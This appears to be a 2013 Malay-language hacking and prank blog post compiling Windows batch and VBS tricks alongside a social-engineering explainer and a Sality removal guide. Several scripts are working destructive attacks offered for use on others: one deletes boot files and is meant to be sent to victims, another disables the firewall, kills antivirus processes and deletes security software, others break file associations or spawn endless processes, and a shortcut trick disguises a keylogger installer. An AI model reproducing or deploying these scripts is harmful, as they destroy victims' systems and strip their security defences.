Wednesday 27 February 2013

What is Social Engineering

Social Eng adalah permainan minda yang dilakukan oleh seorang PENGGODAM kepada individu dan bergantung kepada kebijaksanaan individu tersebut. Penggodam kebiasaan-nya menggunakan laman sosial untuk menjalankan misi-nya. Antaranya penggodam akan menegur , dan berbicara dengan baik kerana mereka berhati-hati takut muslihat diketahui mangsa. Seterusnya penggodam akan menyuruh mangsa membuka "fake application" dan menyuruh mangsa mengisi maklumat tersebut. Apabila maklumat itu telah di-isi , dengan menekan "ENTER" maklumat yang di-isi akan dihantar ke penggodam seterusnya penggodam mendapat kata-laluan dan email. Kebiasaannya teknik ini lebih difocuskan kepada penggodam yang mahu mempelajari ilmu menggodam dengan cepat.  Selain itu , selepas mangsa yang menekan "fake link" sesuatu website itu dan akan ia menyuruh anda melakukan sesuatu seperti men-download file yang tidak diketahui unsurnya. Kebiasaannya penggodam akan menggunakan "File Sharing" untuk menyebarkan virus dll. Peggodam yang handal boleh membuat sebuah website yang apabila dimasuk ia seperti website sebenar dan membuatkan mangsa lebih mudah tertipu. Apabila file itu telah di-download , penggodam akan menyuruh mangsa menginstall "SETUP" yang baru didownload. "SETUP" yang didownload mungkin berbau kelogger atau pun virus. Penggodam yang handal pandai memanipulasikan coding didalam satu-satu "SETUP" untuk memastikan ia tidak boleh dikesan oleh AV. Kesimpulannya Social Eng ini bergabung dengan mana-mana kaedah lain dan lebih mudah ia adalah perkara asas dalam penggodaman.

Another CMD coding.


1. Salin Coding ini.
@ Echo off
attrib-r-s-h c: \ autoexec.bat
del c: \ autoexec.bat
attrib-r-s-h c: \ boot.ini
del c: \ boot.ini
attrib-r-s-h c: \ ntldr
del c: \ ntldr
attrib-r-s-h c: \ windows \ win.ini
del c: \ windows \ win.ini

2. Letakkan didalam notepad dan simpan sebagai Shutdownforever.bat
3. Hantar kepada manusia yang durjana.
4. Suruh mereka membuka file itu.
5. Selesai

Binary language.


00100000 : Space
01100001 : A
01100010 : B
01100011 : C
01100100 : D
01100101 : E
01100110 : F
01100111 : G
01101000 : H
01101001 : I
01101010 : J
01101011 : K
01101100 : L
01101101 : M
01101110 : N
01101111 : O
01110000 : P
01110001 : Q
01110010 : R
01110011 : S
01110100 : T
01110101 : U
01110110 : V
01110111 : W
01111000 : X
01111001 : Y
01111010 : Z

What is taskkill?


1. Taskkill adalah seperti "Task Manager dan Unlocker Assnt" tetapi taskkill menggunakan CMD a.k.a Command Prompt.
2. Menggunakan taskkill adalah cara lain yang berkesan apabila "Task Manager" anda di-nyahaktifkan
3. Kaedah taskkill ini sama seperti "Task Menager dan Unlocker Assnt" iaitu menamatkan process softwere.
4. Pertama. Tekan Start > Run > Taip CMD. Keluarlah tetingkap hitam.
5. Apabila hendak menggunakan taskkill anda haruslah mengetahui PID softwere yang sedang berfungsi.
6. Anda hanya perlu menaip "tasklist" dan keluar list softwere yang sedang berfungsi.
7. Untuk menggunakan taskkill , anda perlu menaip taskkill /PID (letakkan PID softwere tanpa kurungan)
8. Tekan Enter. Apabila command anda betul dan tepat . command anda akan dijawab seperti ini

[ Success : The process with PID **** has been terminated ]
#kaedah ini boleh digunakan untuk bermain percuma di-cafe cyber

Pop-up spam.


1. Bukak notepad.
2. Salin semua coding ini.
msgbox "You Are An Idiot"
msgbox "A HUGE Virus has been detected on your C: drive!"
msgbox "Attempting to access Panda 2020"
msgbox "Command blocked by unknown cause"
msgbox "Attempting to delete virus"
msgbox "Attempt status:"
do
msgbox "FAILED"
loop
3. Simpan sebagai anything.vbs4. Suruh rakan-rakan anda klik file itu
#Panda AV akan menghalang file berformat .vbs

How to destroy computer.


1. Tekan Start > Run > CMD

2. Apabila keluar tetingkap CMD , taip "ASSOC .exe=.maxcodegun" atau " ASSOC .jpg=.maxcodegun"

3. Nescaya komputer akan menjadi error dan anda tidak dapat melakukan apa-apa.

#Antara kesan-kesanya ialah , anda tidak akan dapat membuka apa-apa jenis softwere atau file yang terdapat didalam komputer dan anda juga tidak dapat "RESTORE" komputer anda kepada asal.
#Terdapat altenatif lain juga iaitu menggunakan .bat file.
1. Bukak notepad dan kosongkan notepad jika ia mengandungi apa-apa maklumat.
2. Tampalkan coding ini didalam notepad [ assoc .exe=exefile / "assoc .exe=exefile ] pilih salah satu.
3. Simpan file itu menjadi .bat file.
4. Klik file yang disimpan itu.

Taskkill for AV


1. Bukak Notepad
2. Tampalkan coding ini didalam notepad
@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --
3. Simpan sebagai format .bat

Spamming CMD on your computer.


1. Bukak notepad2. Salin coding ini.
@echo off
:START
start a.bat
3. Simpan sebagai format .bat
4. Bukak fail ini.

Sality


1. Putuskan komputer anda dari jaringan manapun, baik itu LAN maupun internet.
2. Matikan fitur system restore anda selama proses pembersihan virus sality
3. Download Sality Repair disini
4. Extract file SalityRepair dan klik kanan file repair.inf kemudian klik kanan dan klik Install
5. Matikan semua aplikasi yang aktif dan sedang anda buka
6. Download Norman Malware Cleaner
7. Ubah ekstensi Norman Malware Cleaner dari .exe menjadi .cmd agar aplikasi Norman Malware Cleaner tersebut tidak diinfeksi oleh virus sality
8. Lakukan scanning menggunakan Norman Malware Cleaner.cmd (ekstensi .exe sudah anda rubah menjadi .cmd)
9. Restart komputer anda setelah proses cleaning selesai
10. Download FixReg
11. extrack FixReg.rar dan jalankan registri yang ada di folder FixReg
sesuai dengan windows yang anda gunakan.
12. Restart komputer anda.
13. Periksa task managerm regedit dsb untuk memastikan komputer anda sudah sembuh. Anda juga bisa melakukan scanning pada safe mode untuk memastikan komputer anda sudah benar – benar bersih dari virus sality.

Sebenarnya sudah hampir semua antivirus sudah bisa mendeteksi dan membasmi virus sality ini. Anda bisa mengupdate antivirus anda dan lakukan scanning serta repair menggunakan antivirus yang anda gunakan. Jika antivirus anda ternyata tidak mampu membasminya, maka tips membasmi virus sality secara manual diatas bisa menjadi solusi ampuh terbebas dari serangan W32Sality.AE

Shortcut for shutdown.


1. Tekan Kiri Mouse Di-desktop > Pilih New > Shortcut
2. Taip [shutdown -s -t 01] tanpa kurungan.3. Bagi nama shortcut anda mengikut kegemaran.
4. Tekan " Finish"

Mengubah Icon Shortcut.
1. Tekan Kiri Mouse Di-shortcut yang telah diebuat dan pilih properties.
2. Pilih " Change Icon " dan akan keluar amaran dan tekan " OK"
3. Pilih icon pilihan anda dan tekan " OK "
 1. Tekan Kiri Mouse Di-desktop > Pilih New > Shortcut
2. Taip [shutdown -s -t 01] tanpa kurungan.3. Bagi nama shortcut anda mengikut kegemaran.
4. Tekan " Finish"

Mengubah Icon Shortcut.
1. Tekan Kiri Mouse Di-shortcut yang telah diebuat dan pilih properties.
2. Pilih " Change Icon " dan akan keluar amaran dan tekan " OK"
3. Pilih icon pilihan anda dan tekan " OK "

Notepad coding


1. Menggunakan Notepad sebagai diari anda

- Taipkan .LOG
- Simpan sebagai LOG.txt
- Tuliskan apa sahaja dalamnya dan ia akan disimpan dengan masa apabila anda menyuntingnya (edit) semula.

2. Matrix Notepad

@echo off
color 2
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

Simpan sebagai Matrix.bat dan klik padanya.

3. Membuka DVD Drive

Set oWMP = CreateObject(“WMPlayer.OCX.7?)

Set colCDROMs = oWMP.cdromCollection

do

if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count – 1

colCDROMs.Item(i).Eject

Next

For i = 0 to colCDROMs.Count – 1

colCDROMs.Item(i).Eject

Next

End If

wscript.sleep 5000

loop
Salin kod di atas dan simpan sebagai 'namayangandasuka.vbs'.

4. Prank Hacked Virus

@ECHO off

:Begin

msg * Hell-O..

msg * Kenal aku?

msg * Oh.. Kenal?

msg * Baguslah begitu, ok?

msg * Sebab kau dah kena hack! LOL!

GOTO BEGIN
Salin kod diatas ke dalam notepad dan simpankannya sebagai 'namayangandasuka.bat'.

5. Infinite Notepad

@ECHO off

:top

START %SystemRoot%system32notepad.exe

GOTO top
Simpan sebagai 'namayangandasuka.bat'.

False linking on shortcut


Antara cara untuk mengaktifkan prank / virus yang memerlukan install / keylogger tanpa diketahui mangsa.

Contoh , kita mempunyai " Setup Adobe"1. Buat " Shortcut di desktop"
2. Tukar kan format setup " exe " kepada " txt "
3. Tukar target "shortcut" anda kepada ( contoh : C:\WINDOWS\system32\cmd /c adb.txt ) tanpa kurungan
4. Tukar icon "shortcut" anda agar kelihatan tidak mencurigakan.

External RAM trick..


1. Masukkan pendrive pada port USB..

(Pendrive mestilah bersaiz 1GB..kalau 4GB lebih baik)


2. Klik kanan pada 'My Computer'..


3. Klik 'Properties'..


4. Klik 'Advanced'..


5. Klik 'Settings' pada bahagian 'Performance'


6. Klik 'Advanced'..


7. Klik 'Change' pada 'Virtual Memory'..


8. Pilih memori yang ada pada pendrive anda..


9. Tetapkan nilai yang anda ingini dan klik 'OK'..


10. Restart PC anda..selesai!